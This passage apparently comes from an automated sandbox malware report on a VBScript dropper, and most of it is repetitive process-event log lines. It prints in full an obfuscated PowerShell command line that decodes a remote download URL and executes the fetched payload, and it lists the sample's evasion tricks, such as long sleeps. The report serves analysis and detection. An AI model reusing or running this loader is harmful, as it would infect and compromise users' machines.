uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd Zebo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd ZeboJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFABC4A00BD pushad ; iretd 4_2_00007FFABC4A00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFABC4A097D push E95A91D0h; ret 4_2_00007FFABC4A09C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFABC4A51F5 push eax; ret 4_2_00007FFABC4A5241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFABC5779FE push ds; ret 4_2_00007FFABC5779FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02ECD78C pushfd ; ret 14_2_02ECD78D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Initial fileInitial file: Do While Aspens.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5670Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4261Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6932Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2871Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 7452Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7868Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 5700Thread sleep count: 51 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000002.1095397613.0000021B26570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
